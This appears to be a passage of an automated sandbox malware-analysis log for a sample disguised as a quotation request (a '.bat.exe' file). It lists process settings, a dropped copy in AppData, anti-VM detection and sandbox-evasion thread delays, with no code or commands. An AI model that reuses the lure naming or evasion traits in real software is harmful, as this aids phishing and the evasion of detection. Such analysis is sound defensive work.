Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jnqeRRexnD.exe PID: 2820, type: MEMORYSTR

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Memory allocated: EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Memory allocated: 2A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Memory allocated: 1010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Memory allocated: 7840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Memory allocated: 8840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Memory allocated: 89F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Memory allocated: 99F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Memory allocated: 1250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Memory allocated: 4DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Memory allocated: BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Memory allocated: 2540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Memory allocated: 4540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Memory allocated: 7000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Memory allocated: 8000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Memory allocated: 81A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Memory allocated: 91A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Memory allocated: 1660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Memory allocated: 3090000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Memory allocated: 5090000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599873	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599763	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597653	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596671	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599781
